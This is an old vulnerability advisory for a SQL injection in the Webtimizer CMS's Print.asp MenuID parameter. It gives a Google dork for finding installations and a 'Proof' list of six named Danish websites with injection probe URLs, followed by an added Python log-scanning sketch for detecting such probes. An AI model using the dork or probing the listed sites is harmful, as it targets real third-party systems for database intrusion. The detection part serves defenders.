Sites powered by Webtimizer suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
#********************************************************************************
# [+] Exploit Title : Webtimizer SQL injection vulnerability
#*********************************************************************
# [+] Software link : http://webtimiser.dk
#*****************************************************************
# [+] Exploit Author : Ashiyane Digital Security Team
#****************************************************
# [+] Tested on: Windows 7, Linux
#*********************************
# [+] Google Dork : intext:"Powered by Webtimizer"
#***********************************************************
# [+] Date: 2013/09/01
#*********************
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/Print.asp?MenuID=[SQL Injection]
#
#-------
# Proof:
#-------
#
# http://www.kunstkonservering.dk/Print.asp?MenuID=1'
#
# http://www.danacolor.dk/Print.asp?MenuID=1'
#
# http://www.d-e-b.dk/Print.asp?MenuID=1'
#
# http://www.ditcon.dk/Print.asp?MenuID=1'
#
# http://www.freserammer.dk/Print.asp?MenuID=1'
#
# http://www.handymanonline.dk/Print.asp?MenuID=1'
#
#
######################
discovered by : ACC3SS
######################
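
Detection sketch for site operators (an added example, not part of the original advisory): it scans IIS W3C logs for Print.asp requests whose MenuID is not a plain integer, which is how the quote-appended requests listed under Proof would show up. The log lines, addresses and function names are constructed for illustration, and MenuID being numeric is an assumption drawn from the MenuID=1 requests above.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended format; all addresses are placeholders.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-09-02 10:01:11 GET /Print.asp MenuID=12 198.51.100.7 200
2013-09-02 10:01:15 GET /Print.asp MenuID=1' 198.51.100.9 500
2013-09-02 10:01:20 GET /print.asp menuid=1%27 198.51.100.9 500
2013-09-02 10:02:02 GET /Default.asp MenuID=abc 198.51.100.7 200
2013-09-02 10:02:30 GET /Print.asp - 198.51.100.7 200
"""

def parse_w3c(text):
    """Yield one dict per request line, keyed by the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def bad_menuid(entry):
    """Return the decoded MenuID value if it is not a plain integer, else None."""
    # Assumption: MenuID is a numeric identifier, as in the MenuID=1 requests above.
    if not entry["cs-uri-stem"].lower().endswith("/print.asp"):
        return None
    query = entry["cs-uri-query"]
    if query == "-":  # IIS logs "-" when there is no query string
        return None
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() == "menuid":  # ASP parameter names are case-insensitive
            for value in values:
                if not re.fullmatch(r"[0-9]+", value):
                    return value
    return None

def find_probes(text):
    """Return (client IP, decoded MenuID, HTTP status) for each flagged request."""
    hits = []
    for entry in parse_w3c(text):
        value = bad_menuid(entry)
        if value is not None:
            hits.append((entry["c-ip"], value, entry["sc-status"]))
    return hits

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

A flagged request that also returned status 500 suggests the value reached the database layer unvalidated; the durable fix is to reject non-integer MenuID values in Print.asp and bind the value as a query parameter.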